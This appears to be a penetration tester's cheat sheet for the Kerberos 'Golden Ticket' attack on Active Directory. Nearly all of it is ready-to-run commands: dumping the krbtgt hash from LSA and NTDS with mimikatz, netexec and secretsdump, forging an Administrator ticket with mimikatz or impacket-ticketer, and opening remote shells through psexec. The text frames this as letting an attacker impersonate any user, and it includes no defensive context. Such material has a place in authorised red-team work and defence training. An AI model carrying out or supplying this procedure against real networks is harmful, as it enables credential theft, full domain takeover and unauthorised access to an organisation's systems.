Golden Ticket

forge a Kerberos Ticket Granting Ticket (TGT) with a domain's KRBTGT account hash, allowing an attacker to impersonate any user including domain admins without needing their credentials.

Get domain SID

locally:

(Get-ADDomain).DomainSID

whoami /user # (domain SID is the part before the last hyphen (RID).)

remotely:

nxc ldap <target> -u <user> -p <pass> --sid

Get krbtgt account hash

locally - mimikatz

lsadump::lsa /inject /name:krbtgt

remotely - nxc

nxc smb >ip> --local-auth -u '' -p '' --lsa --user krbtgt
nxc smb <dcip> --local-auth -u '' -p '' --ntds --user krbtgt

remotely - secretsdump

impacket-secretsdump user:[email protected]

Generate ticket

with mimikatz

kerberos::golden /User:Administrator /domain:domain.local /sid:<SID> /krbtgt:<krbtgt hash> /id:500 /ptt

spawn shell with ticket

misc::cmd

Now we can use psexec for a shell anywhere

psexec.exe  -accepteula \\hostname cmd.exe

With impacket

impacket-ticketer -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>  <user_name>
# OR with aes
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>  <user_name>

set ticket env var

export KRB5CCNAME=<TGS_ccache_file>

Then you can access anything

impacket-psexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass